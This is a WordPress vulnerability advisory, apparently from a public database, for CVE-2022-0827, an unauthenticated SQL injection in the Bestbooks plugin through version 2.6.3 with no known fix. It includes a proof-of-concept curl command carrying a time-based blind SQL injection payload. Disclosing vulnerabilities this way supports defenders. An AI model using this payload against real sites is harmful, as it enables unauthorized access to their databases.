Bestbooks <= 2.6.3 – Unauthenticated SQLi | CVE 2022-0827 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape some parameters before using them in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users

Proof of Concept

Affected parameters: credit and debit

curl https://example.com/wp-admin/admin-ajax.php \
    --data 'action=bestbooks_add_transaction&type=x&account=x&date=x&description=3&debit=(CASE WHEN (9277=9277) THEN SLEEP(5) ELSE 9277 END)&credit=1'

Affects Plugins

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

0d208ebc-7805-457b-aa5f-ffd5adb2f3be

Timeline

Publicly Published

2022-05-17 (about 1 years ago)

Added

2022-05-17 (about 1 years ago)

Last Updated

2022-05-18 (about 1 years ago)

Other

Published

Title

Published

2014-08-01

Title

Super CAPTCHA <= 2.2.4 - SQL Injection

Published

2014-09-27

Title

Quartz Plugin 1.01.1 - SQL Injection

Published

2024-03-29

Title

Easy Form Builder < 3.7.5 - Authenticated (Contributor+) SQL Injection

Published

2014-08-01

Title

WP-Cal 0.3 - editevent.php SQL Injection

Published

2024-03-29

Title

10Web Map Builder for Google Maps <= 1.0.74 - Authenticated (Administrator+) SQL Injection